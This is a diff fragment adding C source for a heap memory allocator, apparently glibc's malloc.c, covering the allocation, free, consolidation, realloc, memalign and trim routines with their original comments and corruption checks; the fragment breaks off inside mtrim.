+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (victim->size > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
+                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                      while ((unsigned long) size < fwd->size)
+                        {
+                          fwd = fwd->fd_nextsize;
+                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                        }
+
+                      if ((unsigned long) size == (unsigned long) fwd->size)
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin &&
+              (unsigned long) (victim->size) >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin) && victim->size == victim->fd->size)
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        (void) mutex_unlock (&av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have let to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  mutex_lock(&av->mutex);
+		  locked = 1;
+		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    (void)mutex_unlock(&av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      (void)mutex_lock(&av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = p->prev_size;
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      (void)mutex_unlock(&av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, 0);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = p->prev_size;
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (oldp->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (next->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          newp->prev_size = p->prev_size + leadsize;
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
